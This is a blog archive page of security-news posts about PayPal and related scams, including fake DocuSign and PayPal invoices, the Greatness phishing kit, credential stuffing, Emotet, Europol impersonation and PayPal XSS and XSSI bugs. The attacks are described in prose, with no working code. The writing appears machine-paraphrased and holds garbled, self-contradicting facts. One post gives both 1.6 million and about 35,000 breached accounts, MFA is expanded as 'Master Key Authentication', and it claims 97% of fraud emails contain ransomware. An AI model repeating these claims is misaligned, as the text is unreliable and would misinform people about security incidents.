Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label PayPal. Show all posts

Fake Invoices Spread Through DocuSign’s API in New Scam

 



Cyber thieves are making use of DocuSign's Envelopes API to send fake invoices in good faith, complete with names that are giveaways of well-known brands such as Norton and PayPal. Because these messages are sent from a verified domain - namely DocuSign's - they go past traditional email security methods and therefore sneak through undetected as malicious messages.

How It Works

DocuSign is an electronic signing service that the user often provides for sending, signing, and managing documents in a digital manner. Using the envelopes API within its eSignature system, document requests can be sent out, signed, and tracked entirely automatically. Conversely, attackers discovered how to take advantage of this API, where accounts set up for free by paying customers on DocuSign are available to them, giving them access to the templates and the branding feature. They now can create fake-looking invoices that are almost indistinguishable from official ones coming from established companies.

These scammers use the "Envelopes: create" function to send an enormous number of fake bills to a huge list of recipients. In most cases, the charges in the bill are very realistic and therefore appear more legitimate. In order to get a proper signature, attackers command the user to "sign" the documents. The attackers then use the signed document to ask for payment. In some other instances, attackers will forward the "signed" documents directly to the finance department to complete the scam.


Mass Abuse of the DocuSign Platform

According to the security research firm Wallarm, this type of abuse has been ongoing for some time. The company noted that this mass exploitation is exposed by DocuSign customers on online forums as users have marked complaints about constant spamming and phishing emails from the DocuSign domain. "I'm suddenly receiving multiple phishing emails per week from docusign.net, and there doesn't seem to be an obvious way to report it," complained one user.

All of these complaints imply that such abuse occurs on a really huge scale, which makes the attacker's spread of false invoices very probably done with some kind of automation tools and not done by hand.

Wallarm already has raised the attention of the abuse at DocuSign, but it is not clear what actions or steps, if any, are being taken by DocuSign in order to resolve this issue.


Challenges in Safeguarding APIs Against Abuse

Such widespread abuse of the DocuSign Envelopes API depicts how openness in access can really compromise the security of API endpoints. Although the DocuSign service is provided for verified businesses to utilise it, the attack teams will buy valid accounts and utilize these functions offered by the API for malicious purposes. It does not even resemble the case of the DocuSign company because several other companies have had the same abuses of their APIs as well. For instance, hackers used APIs to search millions of phone numbers associated with Authy accounts to validate them, scraping information about millions of Dell customers, matching millions of Trello accounts with emails, and much more.

The case of DocuSign does show how abuses of a platform justify stronger protections for digital services that enable access to sensitive tools. Because these API-based attacks have become so widespread, firms like DocuSign may be forced to consider further steps they are taking in being more watchful and tightening the locks on the misuses of their products with regards to paid accounts in which users have full access to the tools at their disposal.


Unlocking Data Privacy: Mine's No-Code Approach Nets $30 Million in Funding

 


An Israeli data privacy company, Mine Inc., has announced that it has completed a $30 million Series B fundraising round led by Battery Ventures, PayPal Ventures, as well as the investment arm of US insurance giant Nationwide, with the participation of a third investor. In addition to Gradient Ventures, Saban Ventures, MassMutual Ventures, and Headline Ventures, which are all existing investors, Google's AI fund Gradient Ventures also joined the round of investment.

Using artificial intelligence and specifically natural language processing, Mine is capable of scanning your inbox to identify which companies have access to your personal information, as well as allowing you to delete any information that you had no reason to have access to. 

There were a lot of concerns that people had concerning GDPR, and the product sparked a lot of interest: initially free, the startup managed to rake in about 5 million users in just a few weeks. Next, the company was able to expand its user base to include business users and enterprise applications. 

Mine can figure out all of the locations where the end user is installing and using customer or business data from a scan of the user's inbox and log-on authenticity. In this instance, it struck a chord with the privacy officers who are responsible for keeping companies in compliance with privacy rules and that resonated with them as well.

150 clients are using Mine’s data privacy and disclosure solutions to protect their data. These companies include Reddit, HelloFresh SE, Fender, Guesty, Snappy, and Data.ai. By raising this capital, the Company will be able to fund its ongoing operations in the coming years as well as expand its global operations, including expanding the company's MineOS B2B platform into the US and expanding its offerings to the enterprise market. 

With 35 employees, the company is in the process of hiring dozens of developers, QA professionals, and machine learning professionals to be based in Israel. Founded in 2019, Mine is a company headquartered in Tel Aviv, with the company's founding members being CEO Gal Ringel, CTO Gal Golan, and CPO Kobi Nissan.

Since the company started, its vision has been to provide companies and individuals with ease of access to privacy regulations. It has been two years since the company's vision around its MineOS B2B platform has sharpened, and it aims to provide the company with a Single Source of Truth (SSOFT) of data within its organization, enabling them to identify which systems, assets, and data they have within their organization. 

In every organization, this process, known as Data Mapping, is one of the most important building blocks which serves as a basis for a variety of teams, including legal and privacy teams, data teams, engineering teams, information technologies, and security teams. It is the most important building block for many teams within a company. As Ringel said, "The funding was complete at the end of the second week of October, just one week after the war had begun." 

As a result of the difficult market conditions of the past year, we have managed the company very carefully and disciplined since March last year while reducing monthly expenses and boosting revenue significantly to a rate of millions of dollars in annualized return on equity (4x growth in 2023) which has allowed us to achieve extraordinary metrics that have attracted many investors to the company. 

There is no doubt that mineOS is one of the greatest open-source operating systems out there, and as such it has hundreds of enterprise customers, including Reddit, HelloFresh SE, FIFA and Data.ai, and Data.ai it announces $30 million in Series B funding to continue its development. There are two leads in this round, Battery Ventures (from the financial giant) and PayPal Ventures (from the payments giant) as well as all of the previous backers that were involved in this round, including Saban Ventures, Gradient Ventures (Google's AI fund), MassMutual Ventures, and Headline Ventures. 

Although Mine has not disclosed its valuation, the co-founder and CEO, Gal Ringel, told me during his recent interview that the company has increased in valuation three times since its last fundraising back in 2020. (The previous round was $9.5 million after the company had only 100,000 users and no revenue.) Mine has raised over $42.5 million in funding. 

A part of the new funding will be used for both sales development surrounding Mine's current offerings, as well as more funding for R&D. In line with this, Mine intends to launch two new products in Q1 that cater to the explosion in interest and use of artificial intelligence. One of these products is designed for data privacy officers who are prepared to comply with the plans of regulators to adopt artificial intelligence laws shortly. The data protection tools market is not limited to Mine, as it should be. 

The fact that the feature sits close to other data protection activities is why it is more likely to be challenged by other companies in the same arena – for instance, OneTrust, which offers GDPR and consent gate solutions for websites, and BigID, which is a provider of a comprehensive set of compliance tools for data usage and compliance. Ringel said Mine has a strong competitive advantage over these as it is designed with an emphasis on becoming user-friendly, so it can be adopted and used even by people who have no technical background.

Convincing Phishing Pages are Now Possible With Phishing-as-a-Service

 


In several phishing campaigns since mid-2022, a previously unknown phishing-as-a-service (PaaS) offering named "Greatness" has been used as a backend component for various spam campaigns. In addition to MFA bypass, IP filtering, and integration with Telegram bots, Greatness includes features found in some of the most advanced PaaS offerings. These features include integration with some of the most advanced PaaS offerings. 

Phishing attacks are mostly social engineering attacks. Depending on who conducts the attack, they can target a wide range of people. There is a possibility that these emails are spam or scam emails looking to access PayPal accounts. 

There is also the possibility of phishing being an attack specifically targeted at a particular individual. Attackers often tailor their emails to speak directly to you and include information only available from an acquaintance. When an attacker gains access to your data, he or she usually obtains this information. Even if the recipient is very cautious in their responses, it is very difficult for them to avoid being a victim when an email of this kind is sent. Based on research conducted by PhishMe Research, over 97% of all fraudulent emails sent to consumers contain ransomware. 

As a result of the availability of phishing kits like Greatness, threat actors, rookies, and professionals alike, now can design convincing login pages that comply with the account registration process of various online services while bypassing the two-factor authentication protections offered by the service.

As a result of this, the fake pages that appear to be authentic behave as a proxy for the attacker to harvest credentials entered by victims and time-based one-time passwords (TOTPs). 

In addition to the possibility of conducting phishing through text messages, social media, and phone calls, the term 'phishing' is most commonly used in the context of attacks that appear via email. Oftentimes, phishing emails can reach thousands of users directly and disguise themselves among the myriad of benign emails that are received by busy users every day. As a result of attacks, malicious code may be installed on systems (such as ransomware), systems may be sabotaged, and intellectual property may be stolen. 

The focus of Greatness is, for now, limited to Microsoft 365 phishing pages, which allows its affiliates to create highly convincing decoy and login pages, using Greatness' attachment and link builder. The attack incorporates features such as pre-filling the victim's email address and showing the victim's appropriate company logo and background image, which were derived from the actual Microsoft 365 login page in which the victim worked or worked for the target organization. The complexity of the software makes Greatness a particularly attractive option for businesses that do phishing. 

A geographic analysis of the targets in a number of the various campaigns that are ongoing and have been conducted in the past revealed the majority of victims to be companies based in the U.S., U.K., Australia, South Africa, and Canada, with manufacturing, health care, and technology sectors being the most frequently targeted industries. There are slight differences in the exact distribution of victims between each campaign and each country in terms of the sector and location. 

Whenever affiliates deploy and configure the phishing kit provided by Greatness, they can access its more advanced features without technical knowledge. They may even take advantage of the service's more advanced features even if they are unskilled. There are two types of phishing kits. One uses an API to generate phishing claims. The other uses a phishing kit to perform a "man-in-the-middle attack" and generate phishing claims. 

In the latest UK government survey titled "Cyber Security Breaches Survey 2021", the UK government reports that phishing remains the "most common attack vector" when it comes to attack attempts involving their systems. Even though phishing is still being used due to its continued success, up to 32% of employees click on a phishing email link while up to 8% of employees are unaware of the sending. 

The risk of a data breach or malware infection is greatly increased when an individual clicks on a link in a phishing email and then enters their login credentials to access company resources. There are always going to be several levels of privilege escalation, even when an employee has lower access privileges. Cybercriminals put a lot of effort into making their phishing attack vector as convincing as possible to increase their chances of success. 

With the emergence of the Greatness product, Microsoft 365 users are at higher risk of being compromised. Phishing pages can appear more convincing and effective against businesses. Approximately 90% of the affiliates of Greatness target businesses according to the data that Cisco Talos collected. A study of the targeted organizations across several campaign campaigns indicates that manufacturing is the sector given the most attention. This is followed by the healthcare and technology sectors. 

The threat was first observed during mid-2022, and according to VirusTotal, a spike in activity was experienced in December 2022 and March 2023. This was a time when attachment samples increased considerably. 

As part of the attack chain, malicious emails often contain HTML attachments which are executed on opening. This code often contains obfuscated JavaScript code which redirects the recipient to a landing page with their email address pre-filled and prompts them for a password and two-factor authentication code to access the site. 

The credentials entered are forwarded via Telegram to the affiliate's Telegram channel. They will be used to gain unauthorized access to the accounts being accessed. 

If a victim opens an attachment that contains an HTML file, the web browser will execute some narrow JavaScript code that will establish a connection to the attacker's server to get the HTML code of the phishing page. In turn, the attacker's server will display the phishing page to the user in the same browser window. An image of a spinning wheel is displayed on the screen in the code, pretending to show that the document is being loaded, with a blurred image. 

The PaaS is then responsible for connecting to Microsoft 365 and impersonating the victim to log into the victim's account. As a result, if the service detects that MFA is being used, it will prompt the victim to authenticate by using their chosen MFA method (e.g., SMS code, voice call code, push notification, according to the website). 

After a service receives the MFA, the service will continue to impersonate the victim behind the scenes to complete the login process. This will enable it to collect authenticated session cookies associated with the victim. The affiliates will then receive these updates through their Telegram channel or via an email directly from the web panel, depending on which method they choose. 

As it works in conjunction with the API, the phishing kit creates a "man-in-the-middle" attack, asking the victim for information, which is then passed to the legitimate login page in real time, and is further logged by the API. 

If the victim uses MFA (Master Key Authentication), the PaaS affiliate can steal the user passwords and usernames associated with the account and the authenticated session cookies. This is one of the reasons why the Telegram bot is used - it notifies the attacker as soon as possible about valid cookies so that they can make a quick move if the target looks interesting. This likely is one of the reasons why authenticated sessions typically expire after a while, which is one of the reasons the bot is utilized.

PayPal Users Should Check Their Accounts

 


It seems that scammers never cease trying to con people. Keeping customers' information private and secure is of the utmost importance to companies, so they use many ways to protect against a breach in their network. 

Despite these digital blockades, hackers have tried to figure out ways to get around them. As the world learns more about the use of technology, the methods criminals employ to commit theft are also improving. 

Until a few years ago, banks and credit card companies were plagued by much more serious issues related to ID theft than they are today. 

There is the potential for a data breach to occur at any time. Banks and credit card companies must comply with higher standards of data security than companies in the private sector.  

Only a company can take all the necessary steps to safeguard the data of its customers and employees. Login and password restrictions are one of the most annoying things customers face when using their services. The most effective way to ensure the safety of your personal information is not to use your login username as your e-mail address if you are concerned about the security of your personal information. 

As a result, they are even more vulnerable to possible hacking attempts. To keep your password secure, you should never reuse it. The company provides you with a login portal. In this portal, you are told that you cannot use the same password you used in the past. This is intended to protect you and not to annoy you. However, when it says you cannot use a password, it can be quite frustrating. 

This message will appear if you use the same password for the company's portal more than once. This puts you at risk for hackers as you place yourself at risk by reusing passwords. Despite the inconvenience of having a unique login and password, it is better to do so than to face the consequences of identity theft or other financial scams. 

The PayPal System Has Not Been Hacked

There is no need for you to panic, even though you may feel that the headlines are leading you to believe PayPal has been hacked. The company's network has not been compromised. To pull off the scam, credentials were stuffed, which is the kind of fraud perpetrated. Hackers use many combinations of logins to find the true ones, and with password-guessing techniques, they discover the original logins. In other words, it is a kind of onslaught attack against the network, but it does not break the system that protects the company's information and assets. A scammer finds the usernames for other companies that may or may not be as secure as the company in which they are located. This is done for the sake of cross-checking the usernames. 

A company that cleans houses and allows customers to have some login username and password will not have the same kind of data protection as PayPal (PYPL), which was designed to have robust protection for its users and data. There is a much higher chance of hackers being able to break into a less secure company data network. This is because the same login username is used by PayPal and the cleaning companies' customer portals. 

In this way, the hacker will be able to get access to passwords. Hackers use the data they collect to break into broader, safer networks, having access to this kind of data provides them with more opportunities to break into other websites and hack their data. 

It is only one hurdle scammers need to overcome if they wish to gain access to a unique username and password for the site. Having two-factor authentication does not necessarily mean that crooks cannot get through, but at least they will be slowed down. There were about 35,000 PayPal accounts that were hacked by these scammers in December by acquiring authentic usernames for these accounts. 

PayPal Can Assist in Repairing Breached Accounts  

As a result of this latest credential-stuffing attack, PayPal has contacted 34,942 customers whose accounts have been compromised. As part of this presentation, they learned how to better protect themselves and their accounts against cyberattacks in the present as well as in the future. Sometime between the 6th of December and the 8th of December last month, PayPal's customer accounts were compromised by an attacker. There was no notice of the breach until mid-December. 

It is also imperative for customers to use unique usernames and passwords for all of their online accounts to help protect themselves and their accounts. While having original passwords and usernames is a time-consuming and sometimes inconvenient process, it is also one of the easiest and most cost-effective ways to protect individuals' digital identity and their personal information in the digital world. As reported by CNET, Equifax by PayPal company has also offered two years of free identity theft monitoring to affected accounts. 

A Credential Stuffing Attack Breaches PayPal Accounts

 


In December last year, hackers accessed the PayPal accounts of more than 1.6 million users of the online payment service. As a result, PayPal is now sending out data breach notifications to affected users. 

A large number of customer accounts of the company were compromised in this attack. With the help of credential stuffing, the hackers behind this attack were able to gain access to almost 35,000 accounts of this company. 

PayPal sent out a Warning of Security Incidents to affected customers on December 6th and 8th of last year. This warning stated that the attack took place from December 6th to 8th. When the attack took place, the company was able to detect its occurrence as well as implement the necessary steps to mitigate it. PayPal has also launched an internal investigation, there is a search underway for how the hackers responsible were able to gain access to PayPal customers' accounts in the first place. 

Despite the company's claim that the hackers were unable to carry out any transactions through the breached accounts, a lot of sensitive information about affected customers was stolen, such as their full names, dates of birth, physical addresses, Social Security numbers, and tax identification numbers, along with their full names and dates of birth. 

Based on PayPal's investigation, the hackers behind this attack used credential stuffing to access the accounts of PayPal's customers by gaining access to the credentials of PayPal's employees. A popular method of attacking data can be found on the dark web, but unlike a data breach, it uses accounts already in circulation. 

It is often the case that credential-stuffing attacks are orchestrated by using bots that have been programmed to enter passwords and usernames from data breaches. This is required to crack a user's account. There are several bots that attempt to use the same credentials for multiple online services with the hope that the passwords have not changed recently. 

Using the same password across multiple accounts can be dangerous for a user's security. A hacker can access your password by infiltrating a website or service. This is done by establishing a connection with their servers. This allows them to access the rest of the accounts using that password. 

When your PayPal account is hacked, what should you do next? 

If PayPal has notified you that your account was breached by hackers and you received a message that you must reset your password, the company has already done so. Thus, it is recommended that you create a strong, complex, and distinct password for your account the next time you log in so that your account remains safe. A password manager, such as KeePass, will be able to generate strong passwords for you, which can be incorporated into one of the most trustworthy password managers. In addition, many of these sites also allow their users to generate passwords online for free. 

To protect you from identity theft, PayPal is offering two years of free identity monitoring from Equifax. This is done using your name, birth date, address, and social security number. If, however, you wish to extend your protection even further, you may want to sign up for an identity theft protection service. 

It is also recommended that you enable two-factor authentication for your PayPal account, which will help prevent a hacker from gaining access to your account even if they obtain your login credentials, which can be crucial to the safety and security of your account. 

Despite the many risks involved, password reuse is still one of the biggest problems in the online world but hopefully, this unfortunate incident will get people to use strong, complex, and unique passwords - especially when it comes to their financial accounts. 

PayPal Invoices Used for Data Theft

The past few months have seen an increase in the usage of convincing phishing emails made using an attack on PayPal's invoice system. Scammers are constantly seeking new ways to steal your personal information or money. 

Hackers send bogus invoices from PayPal's website using a free PayPal account they have registered. The emails' bodies contained spoof logos of companies like Norton to make their recipients believe they were authentic.

Emails from PayPal will likely be delivered to your inbox rather than your spam bin because they are not regarded as spam. Because it came from a real Paypal account, the email will appear to be trustworthy so users are advised to stay cautious and not fall for it. You won't receive a worthwhile service if you pay this charge, cybercriminals will receive your money and use it for their own gain. 

The PayPal invoices feature statements like "thank you for purchasing Norton Security Premium package, if you have not authorized this transaction, please call us with your credit card details." They resemble a related fraud that employed phony Quickbooks invoices and was disclosed earlier this month.

The scam, often known as a "double spear" assault, prompts users to call the number, at which point hackers attempt to get them to pay the invoice and steal their credit card information.

Phishing efforts are frequent and come in a variety of shapes, according to a written statement from PayPal.

PayPal stated that it has a zero-tolerance policy for attempted fraud on the platform and that its team is working relentlessly to protect its consumers.

"We are aware of this well-known phishing scheme and have added more measures to help mitigate this particular incidence," the company said. "Nevertheless, we advise clients to exercise constant vigilance online and to get in touch with Customer Service immediately if they believe they are a victim of a scam."

It's astonishing how well-adapted modern fraudsters are at using the very same technologies that financial institutions have long utilized to provide their consumers a sense of security while dealing online. 

Today's scamsters seem to be more interested in hacking your entire computer and online life with remote administration software than they are in stealing your PayPal password, which seems to be at the center of the majority of frauds these days.

Users are advised to follow the guidelines given below in order to safeguard themselves against the aforementioned scam. 
  • To prevent phishing emails from being sent to you, don't rely on email spam filters. Examine emails for warning signs, such as impending deadlines and scare tactics, to spot potential phishing frauds.
  • Use a recognized phone number or email address to get in touch with the service provider directly to confirm the validity of an invoice. To get in touch with the service provider, do not utilize the phone number or link provided in the invoice.
  • The simple notion that an email was delivered via a reputable website should not be used as proof of its validity. To make their schemes seem more credible, cybercriminals can exploit reliable websites.

Emotet : The Infamous Botnet Has Returned

 

Kaspersky researchers were able to retrieve and analyze 10 out of 16 modules, with most having been used by Emotet in the past in one form or another. Kaspersky Lab was created in 1997 as multinational cybersecurity and digital privacy organization. Kaspersky's deep risk intelligence and security expertise are continually evolving into new security solutions and services to safeguard enterprises, vital infrastructure, governments, and consumers all around the world. 

Emotet was discovered in the wild for the first time in 2014. Its major purpose back then was to steal user's financial credentials. Since then, it has gone through several modifications, began transmitting other viruses, and eventually evolved into a strong botnet. Emotet is a type of malware classified as banking Trojans. Malspam, or spam emails with malware, is the most common way for it to propagate. To persuade users, these communications frequently contain familiar branding, imitating the email structure of well-known and trustworthy companies such as PayPal or DHL. 

As per Kaspersky telemetry, the number of victims increased from 2,843 in February 2022 to 9,086 in March 2022, indicating the attackers targeted more than three times the number of users. As a result, the number of threats detected by Kaspersky solutions has increased, from 16,897 in February 2022 to 48,597 in March 2022. 

A typical Emotet infection starts with spam e-mails containing malicious macros in Microsoft Office attachments. The actor can use this macro to launch a malicious PowerShell command which will drop and start a module loader, which will then talk with a command and control server to download and start modules. In the percent Windows percent SysWOW64 or percent User percent AppDataLocal directory, Emotet creates a subfolder with a random name and replicates itself under a completely random name and extension. The exported Control RunDLL method is used to launch the Emotet DLL's primary activity. These modules can be used to carry out a range of actions on the infected computer. Kaspersky researchers were able to extract and evaluate 10 of the 16 modules, the majority of which had previously been utilized by Emotet. 

Researchers now state that the Emotet can download 16 modules judging by the recent Emotet protocol and C2 answers. They were able to recover ten of them (including two separate copies of the Spam module), which were utilized by Emotet to steal credentials, passwords, accounts, and e-mail addresses, as well as spam. We present a brief examination of these modules and also statistics on current Emotet attacks in this post. 

To gather the account details of various email clients, the current version of Emotet can create automated spam campaigns which are further spread down the network from infected devices, retrieving emails and email addresses from Thunderbird and Outlook apps and accumulating passwords from popular web browsers like Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 

Emotet infects computers in businesses and homes all around the world. As per our telemetry, Emotet most frequently targeted users from the following countries in Q1 2022: Italy (10.04%), Russia (9.87%), Japan (8.55%), Mexico (8.36%), Brazil (6.88%), Indonesia (4.92%), India (3.21%), Vietnam (2.70%), China (2.62), Germany (2.19%) and Malaysia (2.13%). 

The present set of components is capable of a wide range of malicious activities, including stealing e-mails, passwords, and login data from a variety of sources, as well as spamming. Except for the Thunderbird components, Emotet has utilized all of these modules in some form or another before. However, there are still a few modules that we haven't been able to get our hands-on.

Fraudsters Pose as Europol Chief in an Attempt to Steal Victims PayPal Account Details

 

The federal police's Computer Crime Unit is looking into an identity fraud case concerning Catherine De Bolle, the executive head of the EU's law enforcement organization Europol. Fraudsters are masquerading as the director of Europol, the European Union's law enforcement organization, to mislead individuals into providing their financial information. 

The European Union Agency for Law Enforcement Cooperation, popularly known as Europol, previously called European Police Office and Europol Drugs Unit, is a law enforcement agency of the European Union (EU) constituted in 1998 to properly manage criminal intelligence and counteract significant global organized crime and terrorism through coexistence among competent authorities of EU member states. The Agency has no executive powers, as well as its personnel, are not authorized to detain suspects or act without prior consent from appropriate authorities in the member states. 

According to the Brussels Times, Belgian police have obtained numerous reports of emails posing to have been from Catherine De Bolle, Europol's executive director. The email badmouths the receiver of child pornography and sex trafficking before allegedly stealing the recipient's PayPal account details. 

Catherine De Bolle took over as Europol's executive director in 2018, following Rob Wainwright, whose tenure ended on May 1, 2018. She was previously the top commissioner of the Belgian federal police (1 March 2012–1 May 2018) as well as the police chief of zone Ninove (2001–2012). 

Europol, which had expressed concerns against this type of scam in April, asked web users not to fall for this fraud once again. 

“Our executive director would never contact members of the public threatening individuals with opening a criminal investigation,” tweeted Europol, which does investigate lots of actual cybercrime. 

The email is written in French and the sender introduces itself to be a COPJ – communication by an officer of the judicial police – and commences as: 

“At the request of Ms. Catherine De Bolle, Commissioner General of the Federal Police, elected to the post of Director of Europol — Brigade for the Protection of Minors (BPM), we are sending you this invitation. […] We are initiating legal proceedings against you for child pornography, pedophilia, exhibitionism, cyber pornography, and sex trafficking.” 

This email sent to individuals intimidates the receiver with criminal prosecution if they do not respond within 72 hours. 

“After this deadline, we will be obliged to send our report to the deputy prosecutor at the high court in Créteil [a suburb of Paris] and a cybercrime specialist to establish an arrest warrant against you.” 

This wasn't the first instance where Director De Bolle's name is being used in a phishing scam. Another fraudulent email claimed her power, and that of her successor as commissioner-general of the federal police, Marc De Mesmaeker, in March of this year. 

Following the FBI's Internet Crime Complaint Center, 12,827 individuals in the United States reported being victims of "government impersonation scams" in 2020, leading to severe losses of about $110 million. 

Whereas on the other hand, Check Point analysts disclosed in April 2020 that perhaps a ransomware gang was incarcerating Android phones, alleging victims of owning sexually explicit material and asserting that their personally identifiable information had been transmitted to an FBI data center.

Among the most high-profile cloning frauds, one came in July 2020, where fraudsters stole over $118,000 in bitcoin by hacking more than 100 famous Twitter accounts, including those of then-Amazon CEO Jeff Bezos and then-Democratic presidential contender Joe Biden.

Hacker Uses Credential Phishing to Gain Access Into PayPal Account

 

Analysts from Cofense Phishing Defense Center recently found a unique PayPal credential phishing attack. Phishing is a harmful technique that hackers use to steal sensitive information like banking information, credit card data, usernames, and passwords. The actors pretend to be genuine individuals to lure victims by gaining their trust and stealing their personal information. Even worse, the confidential data stolen through phishing attacks can be used for identity theft, financial theft to gain illegal access into victim accounts, or use this account access to blackmail the victims. 

Because credential phishing is generally conducted through a simple URL link, it is easy to ignore exaggerated or subtle tactics that hackers use to steal credentials from innocent victims. As per the experts, the attack isn't very sophisticated and doesn't seem suspicious. Cybersecurity Analyst Alex Geoghagan said that the email may compel the victim to try finding the solution to the problem quickly. The hacker didn't even bother hiding 'from' email address, which was later identified as not actually being from PayPal. But, the e-mail was very well put together and no one would've thought it as a fraud. 

Alex Geoghagan says "There is a “Help & Contact” link, as well as an (ironic) “Learn to identify Phishing” link in the body of the email, both leading to authentic PayPal links. Beyond the first clue in the sender email address, when hovering over the button labeled “Confirm Your Account,” it does not lead to a PayPal URL. It instead leads to a URL at direct[.]lc[.]chat. A user familiar with PayPal may notice at this point that they are being taken to a domain outside of PayPal, while the legitimate PayPal live chat is hosted within the PayPal domain and requires that you log in to use it." 

After a fake live chat has been accessed, hacker uses automated scripts to start communication with the victims and tries to steal user data, e-mail address, credit card information etc. In other words, hacker takes this information to appear as genuine and store enough information for authentication. Once the information is acquired, hacker tries to steal victim's PayPal credentials. After that, a verification code is sent to target via SMS to make him think an authorised person has access to his device. "This attack demonstrates the complexity of phishing attacks that go beyond the typical “Forms” page or spoofed login. In this case, a carefully crafted email appears to be legitimate until a recipient dives into the headers and links, which is something your average user will most likely not do," says Alex Geoghagan.

Virtual Wallet Users are Being Scammed

 

People are carrying less cash as technology advances, preferring to use debit cards, credit cards, and smartphone payment apps instead. Although using virtual wallets like Venmo, PayPal, and Cash App is easy and becoming more common, there is a risk of being scammed by someone who does not appear to be who they claim to be. Virtual wallets are applications that you can download on your Android or iPhone to make it simple to send and receive money from friends, relatives, and other people. To move money, these apps are connected to a bank account. 

Scammers are always on the lookout for their next victim, and these apps provide them with an ideal opportunity to defraud people of their hard-earned money. Fraudsters have devised a number of strategies for intercepting payments or convincing app users to pay them directly. 

Last year, the Better Business Bureau reported on a new scheme in which con artists send messages requesting the return of unintended payments after making deposits into their victims' accounts. 

When the victim checks their account and discovers these transfers, which were made with stolen credit cards, they refund the funds, by which point the scammer has replaced the stolen credit card credentials with their own. The money is then sent to the fraudster, and the victim is held responsible until the owner of the stolen card files restitution claims. 

In contrast to Cash App and Venmo, PayPal is the oldest form of virtual wallet. In a PayPal scam, the scammer asks a seller to send the things he or she "bought" to a particular address. They discover that the address is invalid after the scammer "pays" for the item and the seller sends the package, but it's too late. 

If the shipping company is unable to locate the address, the item will be marked as undeliverable. The scammer would then contact the shipping company and provide a new address in order to accept the package while claiming they did not receive it. 

The scammer would then collect the item and file a complaint with PayPal claiming that the item was never delivered. PayPal will refund the money charged to the scammer because the buyer has no evidence that the item was shipped. As a result, the seller loses both money and goods to the con artist. 

App developers should take action to protect their users from these types of scams. Multifactor authentication and secondary confirmation, such as emailed security codes, are examples of these safeguards. According to Microsoft research, multifactor authentication will prevent 99.9% of fraud attempts involving compromised login credentials.

PayPal Suffered Cross-Site Scripting -XSS Vulnerability

 

The PayPal currency converter functionality was damaged by severe cross-site scripting (XSS) vulnerability. An attacker might be able to run destructive scripts if the vulnerability is abused. This could lead to the malicious user injecting malicious JavaScript, HTML, or some other form of browser file. The bug was noticed on PayPal's web domain with the currency converter functionality of PayPal wallets. 

On February 19, 2020, the vulnerability was first identified as a concern of "reflected XSS and CSP bypass" by a security researcher who goes by the name "Cr33pb0y" – he's been granted $2,900 in bug bounty programming by HackerOne. 

PayPal said that a flaw occurred in the currency conversion endpoint which was triggered by an inability to adequately sanitize user feedback, in a restricted disclosure that was released on February 10 – almost a year after the researcher identified the problem privately. 

PayPal acknowledged the flaw- in response to the HackerOne forum, that contributed to the currency translation URL managing user feedback inappropriately. A vulnerability intruder may use the JavaScript injection to access a document object in a browser or apply other malicious code to the URL. If hackers load a malicious payload into the browser of a victim, they can steal data or use the computer to take control of the system. As a consequence, malicious payloads can trigger a victim's browser page without its knowledge or consent in the Document Object Model (DOM). 

Typically, XSS attacks represent a browser's script from a specific website and can enable a target to click a malicious connection. Payloads can be used as a theft point in larger attacks or for the stealing of cookies, session tokens, or account information. PayPal has now carried out further validation tests to monitor users’ feedback in the currency exchange function and wipe out errors following the disclosure of the bug bounty hunter. 

XSS bugs are a frequent hacker attack vector. Several recent leaks of data have been related to bugs like what some analysts claim is an XSS flaw. 

While telling that the vulnerability has been fixed, PayPal said, “by implementing additional controls to validate and sanitize user input before being returned in the response.”

PayPal Phishing Scam 2021, Here's How to Stay Guarded

 


Another PayPal phishing campaign attempts to take account logins and other personal data. Noxious individuals are sending clients instant messages warning them that their accounts are permanently "limited" and urging them to sign in and verify their identity and account via a given link. Just as it is run of the mill with PayPal phishing messages, this trick likewise incorporates all the vital parts to deceive clients – a short claim that threatens with the outcome and a phony link that diverts clients to a caricaturing site. 

Cybercriminals abuse clients' inexperience and lack of experience by employing infamous social engineering techniques. They create emails or messages that resemble those from real organizations, which persuades victims to give away their details readily. 

The given hyperlink in the new PayPal phishing campaign diverts telephone clients to a spoofing webpage that appears to be indistinguishable from that of PayPal, however, the web address is observably different. Also, prospective victims are quickly approached to sign in to their accounts. Along these lines, they are diverted to a page where a couple of clarifications on why their accounts have been limited are shown, and they are encouraged to secure their accounts. At that point, PayPal clients see another page where they are approached to give their data, such as complete name, date of birth, and billing address. When clients fill in these details, every one of them is then shipped off to the operators behind the scam. They could utilize them to abuse users' PayPal account, open new bank accounts, or utilize the individual's data for future phishing campaigns. 

On the off chance that you've been fooled into filling these fields, at that point the following steps should be taken to avoid becoming a cyber victim: 

 • Sign in to your PayPal account and change the password right away. 

 • On the off chance that a similar password is utilized for signing in to some other accounts, visit them and change it also. 

 • Inform PayPal regarding such a scam and that you might have got influenced. 

 • To ensure no false accounts are made in your name – issue a temporary freeze on your credit report.

To ensure safe, stay wary of such malicious links and stick to the terms and conditions of the organization. Additionally, please note that PayPal could never send its clients any instant messages or force them to visit and sign in to their system immediately, only cybercriminals operate that way. The organization just sends emails that incorporate such data, and it generally contains a clarification for the constraint.

PayPal Fixes 'High-Severity' Password Security Vulnerability


Researcher Alex Birsan, while examining PayPal's main authentication flow– discovered a critical security flaw that hackers could have exploited to access passwords and email addresses of users. He responsibly reported the vulnerability to PayPal on November 18, 2019, via the HackerOne bug bounty platform and received a bug bounty over $15,000 for the issue which was acknowledged by HackerOne after 18 days of its submission and later patched by the company on 11th December 2019. 

The aforementioned bug affected one of the primary and most visited pages amongst all of PayPal's, which is its 'login form' as mentioned by Birsan in the public disclosure of the flaw. 

As Birsan was exploring the main authentication flaw at PayPal, his attention got directed to a javascript file that seemingly contained a cross-site request forgery (CSRF) token along with a session ID. "providing any kind of session data inside a valid javascript file," the expert told in his blog post, "usually allows it to be retrieved by attackers." 

"In what is known as a cross-site script inclusion (XSSI) attack, a malicious web page can use an HTML <script> tag to import a script cross-origin, enabling it to gain access to any data contained within the file." 

While giving their confirmation, PayPal put forth that sensitive, unique tokens were leaked in a JS file employed by the Recaptcha implementation. Sometimes users find themselves in situations where they have to go through a captcha quiz after authentication and according to the inference drawn by PayPal, "the exposed tokens were used in the post request to solve the captcha challenge." The captcha quiz comes into play after multiple failed login attempts, that is normal until you come to terms with the fact that " “the response to the next authentication attempt is a page containing nothing but a Google captcha. If the captcha is solved by the user, an HTTP POST request to /auth/validate captcha is initiated.” Although, in order to successfully obtain the credentials, the hacker would be required to find a way of making targeted users visit an infected website prior to logging into their PayPal account. 

